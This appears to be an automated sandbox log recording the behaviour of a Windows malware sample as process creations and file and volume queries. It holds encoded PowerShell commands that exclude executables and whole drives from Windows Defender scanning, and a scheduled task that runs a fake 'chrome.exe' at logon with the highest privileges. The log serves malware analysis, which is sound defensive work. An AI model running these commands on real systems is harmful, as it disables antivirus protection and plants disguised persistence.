Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe | Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe | Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\dllhost.exe | Code function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,39_2_0000000140001F00
Source: C:\Windows\System32\dllhost.exe | Code function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,39_2_0000000140001F00
Source: C:\Users\user\AppData\Roaming\34432.exe | Queries volume information: C:\Users\user\AppData\Roaming\34432.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\34432.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe | Queries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe | Queries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
